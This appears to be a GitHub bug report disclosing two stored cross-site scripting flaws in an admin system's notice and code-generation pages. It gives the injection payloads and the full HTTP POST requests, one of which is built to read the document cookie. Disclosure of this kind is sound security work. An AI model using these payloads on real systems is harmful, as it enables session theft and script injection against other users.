There is two XSS vulnerability
ki9mu opened this issue · comments
After the administrator logged in, open the following page
system management->Notice notice
Then add the following XSS statement to the announcement title
poc: ”><sCript>alertxss</SCript>
there is post package:
POST /system/notice/edit HTTP/1.1
Host: localhost
Content-Length: 219
sec-ch-ua: "Chromium";v="89", ";Not A Brand";v="99"
Accept: application/json, text/javascript, /; q=0.01
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/system/notice/edit/10
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=0dc0e965-0a6a-4e08-bb4e-0e4b600be71f
Connection: close
noticeId=10¬iceTitle=%E2%80%9D%3E%3CsCript%3Ealert%60xss%60%3C%2FSCript%3E¬iceType=1¬iceContent=%3Cp%3E%E2%80%9D%26gt%3B%26lt%3BsCript%26gt%3Balert%60xss%60%26lt%3B%2FSCript%26gt%3B%3Cbr%3E%3C%2Fp%3E&status=0&=
After the administrator logged in, open the following page
System tools->code generation
Then click Import, select any one and click OK. Then click Edit, click basic information, and enter the following XSS statement in the column of table name
poc2:')" onmousemove=alert(document.cookie) a=(1
there is post package:
POST /tool/gen/edit HTTP/1.1
Host: localhost
Content-Length: 3880
sec-ch-ua: "Chromium";v="89", ";Not A Brand";v="99"
Accept: application/json, text/javascript, /; q=0.01
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/tool/gen/edit/1
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=0dc0e965-0a6a-4e08-bb4e-0e4b600be71f
Connection: close
tableId=1&tableName=')%22+onmousemove%3Dalert(document.cookie)+a%3D(1&tableComment=%E9%80%9A%E7%9F%A5%E5%85%AC%E5%91%8A%E8%A1%A8&className=SysNotice&functionAuthor=ruoyi&remark=&columns%5B0%5D.columnId=1&columns%5B0%5D.sort=1&columns%5B0%5D.columnComment=%E5%85%AC%E5%91%8AID&columns%5B0%5D.javaType=Integer&columns%5B0%5D.javaField=noticeId&columns%5B0%5D.isInsert=1&columns%5B0%5D.queryType=EQ&columns%5B0%5D.htmlType=input&columns%5B0%5D.dictType=&columns%5B1%5D.columnId=2&columns%5B1%5D.sort=2&columns%5B1%5D.columnComment=%E5%85%AC%E5%91%8A%E6%A0%87%E9%A2%98&columns%5B1%5D.javaType=String&columns%5B1%5D.javaField=noticeTitle&columns%5B1%5D.isInsert=1&columns%5B1%5D.isEdit=1&columns%5B1%5D.isList=1&columns%5B1%5D.isQuery=1&columns%5B1%5D.queryType=EQ&columns%5B1%5D.isRequired=1&columns%5B1%5D.htmlType=input&columns%5B1%5D.dictType=&columns%5B2%5D.columnId=3&columns%5B2%5D.sort=3&columns%5B2%5D.columnComment=%E5%85%AC%E5%91%8A%E7%B1%BB%E5%9E%8B%EF%BC%881%E9%80%9A%E7%9F%A5+2%E5%85%AC%E5%91%8A%EF%BC%89&columns%5B2%5D.javaType=String&columns%5B2%5D.javaField=noticeType&columns%5B2%5D.isInsert=1&columns%5B2%5D.isEdit=1&columns%5B2%5D.isList=1&columns%5B2%5D.isQuery=1&columns%5B2%5D.queryType=EQ&columns%5B2%5D.isRequired=1&columns%5B2%5D.htmlType=select&columns%5B2%5D.dictType=&columns%5B3%5D.columnId=4&columns%5B3%5D.sort=4&columns%5B3%5D.columnComment=%E5%85%AC%E5%91%8A%E5%86%85%E5%AE%B9&columns%5B3%5D.javaType=String&columns%5B3%5D.javaField=noticeContent&columns%5B3%5D.isInsert=1&columns%5B3%5D.isEdit=1&columns%5B3%5D.isList=1&columns%5B3%5D.isQuery=1&columns%5B3%5D.queryType=EQ&columns%5B3%5D.htmlType=summernote&columns%5B3%5D.dictType=&columns%5B4%5D.columnId=5&columns%5B4%5D.sort=5&columns%5B4%5D.columnComment=%E5%85%AC%E5%91%8A%E7%8A%B6%E6%80%81%EF%BC%880%E6%AD%A3%E5%B8%B8+1%E5%85%B3%E9%97%AD%EF%BC%89&columns%5B4%5D.javaType=String&columns%5B4%5D.javaField=status&columns%5B4%5D.isInsert=1&columns%5B4%5D.isEdit=1&columns%5B4%5D.isList=1&columns%5B4%5D.isQuery=1&columns%5B4%5D.queryType=EQ&columns%5B4%5D.htmlType=radio&columns%5B4%5D.dictType=&columns%5B5%5D.columnId=6&columns%5B5%5D.sort=6&columns%5B5%5D.columnComment=%E5%88%9B%E5%BB%BA%E8%80%85&columns%5B5%5D.javaType=String&columns%5B5%5D.javaField=createBy&columns%5B5%5D.isInsert=1&columns%5B5%5D.queryType=EQ&columns%5B5%5D.htmlType=input&columns%5B5%5D.dictType=&columns%5B6%5D.columnId=7&columns%5B6%5D.sort=7&columns%5B6%5D.columnComment=%E5%88%9B%E5%BB%BA%E6%97%B6%E9%97%B4&columns%5B6%5D.javaType=Date&columns%5B6%5D.javaField=createTime&columns%5B6%5D.isInsert=1&columns%5B6%5D.queryType=EQ&columns%5B6%5D.htmlType=datetime&columns%5B6%5D.dictType=&columns%5B7%5D.columnId=8&columns%5B7%5D.sort=8&columns%5B7%5D.columnComment=%E6%9B%B4%E6%96%B0%E8%80%85&columns%5B7%5D.javaType=String&columns%5B7%5D.javaField=updateBy&columns%5B7%5D.isInsert=1&columns%5B7%5D.isEdit=1&columns%5B7%5D.queryType=EQ&columns%5B7%5D.htmlType=input&columns%5B7%5D.dictType=&columns%5B8%5D.columnId=9&columns%5B8%5D.sort=9&columns%5B8%5D.columnComment=%E6%9B%B4%E6%96%B0%E6%97%B6%E9%97%B4&columns%5B8%5D.javaType=Date&columns%5B8%5D.javaField=updateTime&columns%5B8%5D.isInsert=1&columns%5B8%5D.isEdit=1&columns%5B8%5D.queryType=EQ&columns%5B8%5D.htmlType=datetime&columns%5B8%5D.dictType=&columns%5B9%5D.columnId=10&columns%5B9%5D.sort=10&columns%5B9%5D.columnComment=%E5%A4%87%E6%B3%A8&columns%5B9%5D.javaType=String&columns%5B9%5D.javaField=remark&columns%5B9%5D.isInsert=1&columns%5B9%5D.isEdit=1&columns%5B9%5D.isList=1&columns%5B9%5D.queryType=EQ&columns%5B9%5D.htmlType=input&columns%5B9%5D.dictType=&tplCategory=crud&packageName=com.ruoyi.system&moduleName=system&businessName=notice&functionName=%E9%80%9A%E7%9F%A5%E5%85%AC%E5%91%8A¶ms%5BparentMenuId%5D=¶ms%5BparentMenuName%5D=&genType=0&genPath=%2F&subTableName=¶ms%5BtreeCode%5D=¶ms%5BtreeParentCode%5D=¶ms%5BtreeName%5D=